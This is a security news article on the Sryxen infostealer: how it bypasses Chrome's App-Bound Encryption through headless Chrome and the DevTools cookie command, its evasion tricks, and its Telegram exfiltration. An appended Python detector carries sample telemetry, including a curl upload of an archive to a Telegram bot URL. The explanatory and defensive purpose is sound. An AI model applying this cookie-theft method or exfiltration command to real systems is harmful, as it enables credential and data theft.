Sryxen Malware Bypasses Chrome Encryption, Steals Sensitive Data via Innovative Browser Exploit

Sryxen Stealer: The New Malware Bypassing Chrome’s App-Bound Encryption

A new malware named Sryxen has surfaced, posing a significant threat to Windows users by targeting sensitive browser data. This C++-based information stealer is sold as Malware-as-a-Service (MaaS) and is designed to quickly harvest credentials without establishing persistence on infected systems.

Innovative Bypass of Chrome’s App-Bound Encryption

Google introduced App-Bound Encryption in Chrome version 127 to enhance the security of cookies and other sensitive data. Sryxen circumvents this protection by launching Chrome in headless mode, which runs the browser without a graphical user interface. It then uses Chrome’s DevTools Protocol to request decrypted cookie data directly from the browser. This approach sidesteps the encryption entirely: the browser performs the decryption on the malware's behalf, so the stealer never has to decrypt the data stored on disk itself.

Technical Execution

Upon execution, Sryxen terminates any active Chrome processes and relaunches the browser with specific command-line arguments:

– `--headless`

– `--remote-debugging-port`

– `--user-data-dir`

These parameters enable remote debugging capabilities without displaying any visible windows. Sryxen then connects to the debugging port via WebSocket and sends a DevTools Protocol command (`Network.getAllCookies`) to retrieve all cookies. Chrome processes this request internally, decrypting the cookies using its own App-Bound Encryption key and returning the plaintext data to the stealer. Since the decrypted cookies never touch the disk, file-based monitoring tools are rendered ineffective.

Evasion Techniques

Sryxen employs multiple layers of protection to avoid detection and analysis:

– Code Encryption: Utilizes Vectored Exception Handling-based code encryption, keeping its main payload encrypted at rest and only decrypting it during execution through exception handling mechanisms. This technique complicates static analysis, as the malicious code appears as garbage data when examined without running it.

– Anti-Debugging Measures: Implements six separate anti-debug checks, including NtGlobalFlag inspection and PEB analysis, terminating execution if debugging tools are detected.

Data Exfiltration

After harvesting browser information, passwords, and cryptocurrency wallet data, Sryxen compresses the collected data into an archive. It then uploads the archive, using curl commands executed through PowerShell, to a Telegram bot controlled by the attackers.
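Although the decrypted cookies never touch disk, both the browser relaunch described under "Technical Execution" and the PowerShell-driven curl upload described here are visible in process-creation telemetry. The following is an added example, not code from Sryxen or from any security vendor: it assumes Sysmon-style `Image`, `ParentImage` and `CommandLine` fields and runs over constructed sample events.

```python
"""Process-creation detection for the Sryxen launch and exfil pattern described above.
Added example, not Sryxen's or any vendor's code. Events are constructed in the style of
Sysmon Event ID 1; the field names Image/ParentImage/CommandLine are an assumption."""

CHROMIUM_IMAGES = {"chrome.exe", "msedge.exe"}  # Edge included by assumption: same flags
DEBUG_FLAGS = {"--headless", "--remote-debugging-port"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def debug_flags(cmdline: str) -> set:
    """DEBUG_FLAGS present on the command line; handles --flag=value and --flag value."""
    names = (tok.split("=", 1)[0].lower() for tok in cmdline.split())
    return {n for n in names if n in DEBUG_FLAGS}

def is_headless_debug_launch(event: dict) -> bool:
    """A Chromium browser started with both --headless and --remote-debugging-port.
    Either flag alone is common in automation; both together on a user endpoint is the signal."""
    if basename(event.get("Image", "")) not in CHROMIUM_IMAGES:
        return False
    return DEBUG_FLAGS <= debug_flags(event.get("CommandLine", ""))

def is_powershell_curl_exfil(event: dict) -> bool:
    """curl.exe spawned by PowerShell with a Telegram Bot API URL on its command line."""
    child, parent = basename(event.get("Image", "")), basename(event.get("ParentImage", ""))
    return (child == "curl.exe" and parent in SHELLS
            and "api.telegram.org/bot" in event.get("CommandLine", "").lower())

def scan(events: list) -> list:
    """Return (index, rule_name) pairs for every event that matches a rule."""
    rules = {"headless_devtools_launch": is_headless_debug_launch,
             "powershell_curl_telegram": is_powershell_curl_exfil}
    return [(i, n) for i, ev in enumerate(events) for n, r in rules.items() if r(ev)]

SAMPLE_EVENTS = [  # constructed telemetry: a benign launch, then one hit per rule
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"chrome.exe" --profile-directory=Default'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\dropper.exe",
     "CommandLine": '"chrome.exe" --headless --remote-debugging-port=9222 '
                    '--user-data-dir="C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data"'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'curl.exe -F document=@archive.zip https://api.telegram.org/bot<REDACTED>/sendDocument'},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # [(1, 'headless_devtools_launch'), (2, 'powershell_curl_telegram')]
```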

Implications and Recommendations

The emergence of Sryxen underscores the evolving sophistication of malware designed to bypass advanced security measures. Users and organizations are advised to:

– Keep Software Updated: Regularly update browsers and operating systems to benefit from the latest security patches.

– Exercise Caution: Be vigilant when downloading and installing software, especially from unverified sources.

– Implement Security Solutions: Utilize comprehensive security solutions that can detect and mitigate such threats.

By staying informed and adopting proactive security measures, users can better protect themselves against threats like Sryxen.